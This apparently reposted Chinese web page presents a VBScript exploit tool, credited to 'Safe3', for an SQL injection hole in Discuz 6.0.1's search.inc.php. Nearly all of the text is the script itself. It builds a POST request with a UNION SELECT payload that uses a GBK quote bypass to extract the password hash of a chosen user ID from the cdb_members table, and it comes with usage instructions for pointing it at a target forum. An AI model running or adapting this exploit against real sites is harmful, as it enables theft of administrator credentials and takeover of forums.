discuz 任意管理員密碼漏洞利用工具 vbs代碼

2020-07-26 11:53:54

字體：大中小

來源：轉載

供稿：網友

也利于修改
以下是search.inc.php 文件漏洞利用代碼VBS版

復制代碼代碼如下:

 
Dim strUrl,strSite,strPath,strUid 
showB() 
Set Args = Wscript.Arguments 
If Args.Count <> 3 Then 
ShowU() 
Else 
strSite=Args(0) 
strPath=Args(1) 
strUid=Args(2) 
End If 
strUrl="action=search&searchid=22%cf' UNION SELECT 1,password,3,password/**/from/**/cdb_members/**/where/**/uid=" & strUid &"/*&do=submit" 
Set objXML = CreateObject("Microsoft.XMLHTTP") 
objXML.Open "POST",strSite & strPath & "index.php", False 
objXML.SetRequestHeader "Accept", "*/*" 
objXML.SetRequestHeader "Accept-Language", "zh-cn" 
objXML.SetRequestHeader "Content-Type", "application/x-www-form-urlencoded" 
objXML.SetRequestHeader "User-Agent", "wap" 
objXML.send(strUrl) 
wscript.echo(objXML.ResponseText) 
Sub showB() 
With Wscript 
.Echo("+--------------------------=====================------------------------------+") 
.Echo("Exploit discuz6.0.1") 
.Echo("Code By Safe3") 
.Echo("+--------------------------=====================------------------------------+") 
End with 
End Sub 
Sub showU() 
With Wscript 
.Echo("+--------------------------=====================------------------------------+") 
.Echo("用法:") 
.Echo(" cscript "&.ScriptName&" site path uid") 
.Echo("例子:") 
.Echo(" cscript "&.ScriptName&" http://www.example.com/ /forum/ 1 >result.txt") 
.Echo("+--------------------------=====================------------------------------+") 
.Quit 
End with 
End Sub 